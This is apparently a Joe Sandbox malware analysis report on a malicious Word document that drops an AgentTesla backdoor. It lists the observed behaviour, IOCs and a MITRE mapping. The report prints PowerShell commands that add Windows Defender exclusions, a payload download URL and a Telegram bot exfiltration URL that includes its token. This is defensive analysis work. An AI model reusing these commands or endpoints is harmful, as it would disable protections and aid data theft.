Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmp | Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Queries volume information: C:\Users\user\AppData\Roaming\CTF loader_es.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformation
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeQueries volume information: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e410a8.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.6.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.CTF loader_es.exe.3c1ac88.7.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.Bw6d8Paf6bOV36xS4N6.exe.3e0ac88.7.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter1 | Startup Items1 | Startup Items1 | Masquerading221 | OS Credential Dumping | Security Software Discovery21 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Web Service1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution13 | Registry Run Keys / Startup Folder221 | Access Token Manipulation1 | Disable or Modify Tools11 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection111 | Virtualization/Sandbox Evasion121 | Security Account Manager | Virtualization/Sandbox Evasion121 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder221 | Access Token Manipulation1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection111 | LSA Secrets | File and Directory Discovery12 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol12 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | System Information Discovery14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 404236  Sample: Allignright_companyprofile.doc  Startdate: 04/05/2021  Architecture: WINDOWS  Score: 100

Sample-level findings: contacts api.telegram.org; Multi AV Scanner detection for dropped file; Sigma detected: Powershell adding suspicious path to exclusion list; Multi AV Scanner detection for submitted file; 14 other signatures

Process tree:

  • EQNEDT32.EXE
    contacts s3-us-west-2-r-w.amazonaws.com (52.218.240.113, 49167, 80, AMAZON-02US, United States) and miolouno.s3-us-west-2.amazonaws.com
    drops C:\Users\user\AppData\...\CTF loader_es.exe (PE32) and C:\Users\user\AppData\Local\...\mad[1].exe (PE32)
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    • CTF loader_es.exe
      drops C:\Windows\Resources\Themes\...\svchost.exe (PE32) and C:\Users\user\...\Bw6d8Paf6bOV36xS4N6.exe (PE32)
      Creates an autostart registry key pointing to binary in C:\Windows
      Adds a directory exclusion to Windows Defender
      • Bw6d8Paf6bOV36xS4N6.exe
        Adds a directory exclusion to Windows Defender
        Injects a PE file into a foreign processes
        • powershell.exe (4 instances)
      • powershell.exe (2 instances)
      • 7 other processes
  • svchost.exe
    Multi AV Scanner detection for dropped file
    Machine Learning detection for dropped file
  • Bw6d8Paf6bOV36xS4N6.exe
    Adds a directory exclusion to Windows Defender
    • powershell.exe (4 instances)
  • WINWORD.EXE

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Allignright_companyprofile.doc | 15% | ReversingLabs | Document-RTF.Exploit.Heuristic

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 100% | Joe Sandbox ML |
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 41% | Virustotal |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 19% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 41% | Virustotal |
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 19% | Metadefender |
C:\Users\user\AppData\Roaming\CTF loader_es.exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 41% | Virustotal |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 19% | Metadefender |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe | 19% | Metadefender |
C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-us-west-2-r-w.amazonaws.com | 52.218.240.113 | true | false |  | high
api.telegram.org | 149.154.167.220 | true | false |  | high
miolouno.s3-us-west-2.amazonaws.com | unknown | unknown | false |  | high

        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://miolouno.s3-us-west-2.amazonaws.com/mad.exe | false |  | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/ | CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CTF loader_es.exe, 00000004.00000003.2124857296.0000000002B2B000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.218.240.113 | s3-us-west-2-r-w.amazonaws.com | United States | 16509 | AMAZON-02US | false

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:404236
Start date:04.05.2021
Start time:20:30:17
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 15m 55s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Allignright_companyprofile.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:40
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Report size exceeded maximum capacity and may have missing behavior information.
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
20:30:38 | API Interceptor | 152x Sleep call for process: EQNEDT32.EXE modified
20:30:43 | API Interceptor | 219x Sleep call for process: CTF loader_es.exe modified
20:30:51 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
20:30:52 | API Interceptor | 243x Sleep call for process: powershell.exe modified
20:30:57 | API Interceptor | 178x Sleep call for process: Bw6d8Paf6bOV36xS4N6.exe modified
20:31:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
20:31:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
20:31:15 | API Interceptor | 8x Sleep call for process: svchost.exe modified
20:31:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
20:31:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

Joe Sandbox View / Context

IPs

No context

Domains

Match | Associated Sample Name / URL | Detection | Context
s3-us-west-2-r-w.amazonaws.com | PO5421-allignright.doc | malicious | 52.218.170.106
 | 04052021paymentscancopy.doc | malicious | 52.218.224.193
 | d2c23008_by_Libranalysis.xlsx | malicious | 52.218.180.209
 | xSf | malicious | 52.218.240.169
 | https://cornpany.s3-us-west-2.amazonaws.com/kzrtl.html | malicious | 52.218.252.49
 | https://share-my-resume.s3-us-west-2.amazonaws.com/2020/Emir-Markham-Resume-2020-11-16.doc | malicious | 52.218.152.113
 | http://bcx-production-attachments-us-west-2.s3-us-west-2.amazonaws.com | malicious | 52.218.233.113
 | https://docs.google.com/document/d/e/2PACX-1vQxWTOwb4Q2IRxBsWs4I-tazKn6L7Tlb_umbjgm-Hc4VjUaQL96-AhMAkd3g6-XzhGxdl8RYebE29rp/pub | malicious | 52.218.237.153
 | https://docs.google.com/document/d/e/2PACX-1vS6NK2IbibcQuT3uZBBdNEmndunv9Oiw0jTUmBO6uKBjix7DH6ZwB0EWgfTu2CvIIHlPw9P7lmFSzeT/pub | malicious | 52.218.205.17
 | 5476gsmtf9b8f15e4201.exe | malicious | 52.218.244.145
 | https://carletoalawyer.com/jss/ | malicious | 52.218.234.105
 | http://coreit.in/?a&login=fakeuser@devnull.com | malicious | 52.218.128.29
 | PaymentPlan.docx | malicious | 52.218.249.65
api.telegram.org | PO5421-allignright.doc | malicious | 149.154.167.220
 | Pending DHL Shipment Notification REF 04521.xlsx | malicious | 149.154.167.220
 | 04052021paymentscancopy.doc | malicious | 149.154.167.220
 | 85a3f6aa_by_Libranalysis.rtf | malicious | 149.154.167.220
 | BID6200306761.exe | malicious | 149.154.167.220
 | OverdueInvoice-PDF.exe | malicious | 149.154.167.220
 | SLIP.exe | malicious | 149.154.167.220
 | NeworderMay20212021-pdf.exe | malicious | 149.154.167.220
 | 1hbYGZf6BQ.exe | malicious | 149.154.167.220
 | from-iso_RFQ___PU.EXE1__.exe | malicious | 149.154.167.220
 | Xerox Scan_07122020181109.exe | malicious | 149.154.167.220
 | menXxRXr64.exe | malicious | 149.154.167.220
 | pN0fSLX8vx.exe | malicious | 149.154.167.220
 | Order Of Items Listed.xlsx | malicious | 149.154.167.220
 | l6qQa2fQ97.exe | malicious | 149.154.167.220
 | PO 300174.xlsx | malicious | 149.154.167.220
 | Quotation.exe | malicious | 149.154.167.220
 | WdWqhSMRsdKJxkl.exe | malicious | 149.154.167.220
 | Quotation 90809.exe | malicious | 149.154.167.220
 | nrEs3n7XCQ.exe | malicious | 149.154.167.220

ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02US | PO5421-allignright.doc | malicious | 52.218.170.106
 | pasteBorder.dll | malicious | 13.224.187.73
 | 04052021paymentscancopy.doc | malicious | 52.218.224.193
 | Indeed_Update_File.html | malicious | 143.204.98.87
 | presentation.jar | malicious | 15.237.76.117
 | presentation.jar | malicious | 143.204.98.25
 | Tmw6ajHw6W.exe | malicious | 3.14.182.203
 | New Financial Reports & Statements.html | malicious | 52.218.137.48
 | 609110f2d14a6.dll | malicious | 54.154.149.76
 | 945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exe | malicious | 3.14.18.91
 | SWIFT 00395_IMG.exe | malicious | 3.34.109.201
 | jH70i5mxJO.exe | malicious | 54.188.107.146
 | 3ZtdRsbjxo.exe | malicious | 104.192.141.1
 | Documents_111651917_375818984.xls | malicious | 18.222.240.99
 | 4GGwmv0AJm.exe | malicious | 52.32.122.68
 | c647b2da_by_Libranalysis.exe | malicious | 54.72.3.133
 | #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm | malicious | 143.204.98.42
 | Documents_95326461_1831689059.xls | malicious | 3.134.106.170
 | 0d69e4f6_by_Libranalysis.xls | malicious | 99.83.154.118
 | d630fc19_by_Libranalysis.xlsx | malicious | 52.219.40.51

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\CTF loader_es.exe | PO5421-allignright.doc | malicious
 | lsqtIv1jRK.exe | malicious
 | 04052021paymentscancopy.doc | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe | PO5421-allignright.doc | malicious
 | lsqtIv1jRK.exe | malicious
 | 04052021paymentscancopy.doc | malicious
